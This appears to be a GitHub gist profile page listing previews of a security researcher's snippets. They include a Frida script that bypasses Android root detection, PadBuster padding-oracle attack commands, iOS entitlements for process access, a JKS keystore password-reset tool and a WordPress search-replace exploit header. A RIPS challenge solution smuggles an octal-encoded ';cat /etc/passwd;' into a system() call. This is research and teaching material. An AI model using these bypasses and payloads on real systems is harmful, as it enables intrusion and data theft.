Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

116 followers · 1 following
View GitHub Profile
@pich4ya
pich4ya / secureRootCert1.java
Last active November 29, 2019 07:30
วิธีการไม่ trust all HTTPS cert เวลาต่อ internal API ที่ API server ใช้ cert ที่ issue มาจาก internal root CA
/*
ต้อง
- แน่ใจว่ามีไฟล์ root certificate แล้ว
- ตั้ง $JAVA_HOME ให้ถูกที่ และแน่ใจว่ามีโฟล์ $JAVA_HOME/jre/lib/security/cacerts
- รหัสผ่านของ Java keystore เป็นคำว่า changeit โดยค่า default
วิธีการ
1. ต้องไปดาวน์โหลดหรือขอ root certificate ที่จะใช้มาก่อน
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / padbuster_macos2019.txt
Created August 5, 2019 08:22
Install PadBuster on macOS Mojave 10.14.5
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster
perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"
@pich4ya
pich4ya / TouchID_for_sudo.txt
Last active September 5, 2019 07:50
MacOS's TouchID for sudo in iTerm2
1. $ sudo vim /etc/pam.d/sudo
2. add this line on top of the content
auth sufficient pam_tid.so
3.
:w!
:q
4. works now for Terminal, but for iTerm 2, go to top menu
@pich4ya
pich4ya / Clutch.entitlements
Last active June 17, 2019 16:18
Killed: 9 on iPhone 6
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>platform-application</key>
<true/>
<key>get-task-allow</key>
<true/>
<key>task_for_pid-allow</key>
<true/>
@pich4ya
pich4ya / keybase.md
Created June 2, 2019 07:46

Keybase proof

I hereby claim:

  • I am pich4ya on github.
  • I am pichaya (https://keybase.io/pichaya) on keybase.
  • I have a public key ASAWUHK10DC94H4bI4qpXRsGFGypRqHnK3MPjvJZMnd1bwo

To claim this, I am signing this object:

@pich4ya
pich4ya / longcat_rips.php
Last active May 10, 2019 19:51
Solution for RIPS Technologies Challenge @ https://www.facebook.com/ripstech/photos/a.332349150429712/917883391876282/
<?php
// @author Pichaya Morimoto (Siam Thanat Hack Company Limited)
$file='image.png';
$_GET['size']='\\473\\143\\141\\164\\40\\57\\145\\164\\143\\57\\160\\141\\163\\163\\167\\144\\473';
$e = stripcslashes(
preg_replace('/[^0-9\\\]/',
'',
isset($_GET['size'])?$_GET['size'] : '25')
);
echo system("convert $file --resize $e ./thumbs/$file");
@pich4ya
pich4ya / พฤติมาตร.txt
Last active March 8, 2019 18:15
For educational purposes only. - https://www.blognone.com/node/108546 - [SHA-256: 8e686a74c47fb1733ed201b76f0a7cfaeed66140599b7b1043f905a7ad9b6044 - app-nbtc.apk / 1552060769 ]
1.) BackgroundServiceNew will be triggered through JobInfo.Builder(..) in:
com/electronicshell/nbtcconsult/QuestionActivity.java
34:import com.electronicshell.nbtcconsult.BackGroundUse.BackgroundServiceNew;
122: JobInfo jobInfo = new JobInfo.Builder(123, new ComponentName(context, BackgroundServiceNew.class)).setRequiresCharging(true).setRequiredNetworkType(1).setPersisted(true).setPeriodic(900000L).build();
com/electronicshell/nbtcconsult/BackGroundUse/BootDeviceReceiver.java
35:import com.electronicshell.nbtcconsult.BackGroundUse.BackgroundServiceNew;
91: JobInfo jobInfo = new JobInfo.Builder(123, new ComponentName(context, BackgroundServiceNew.class)).setRequiresCharging(true).setRequiredNetworkType(1).setPersisted(true).setPeriodic(900000L).build();
com/electronicshell/nbtcconsult/NewMenuActivity.java
@pich4ya
pich4ya / ChangePassword.java
Created February 24, 2019 07:47 — forked from zach-klippenstein/ChangePassword.java
The keystore password on Java keystore files is utterly pointless. You can reset it without knowing it, as shown by this code. Note that private keys are still secure, as far as I know. The JKS implementation is copyright Casey Marshall ([email protected]), and the original source is available at http://metastatic.org/source/JKS.java. I've in…
import java.util.*;
import java.io.*;
import java.security.*;
public class ChangePassword
{
private final static JKS j = new JKS();
public static void main(String[] args) throws Exception
{
@pich4ya
pich4ya / searchreplacedb2_exploit.py
Created February 20, 2019 01:26
Exploit for wpscan's searchreplacedb2.php (Safe Search and Replace version 2.0.1)
# @author longcat (Pichaya Morimoto / [email protected])
# update user's password hash using some match&replace magic
#
# Exploit for wpscan's command output:
# [+] http://<wp-site>/searchreplacedb2.php
# | Found By: Search Replace Db2 (Aggressive Detection)
# | Confidence: 100%
# | Reference: https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
#
# Originally written by Lee Nichol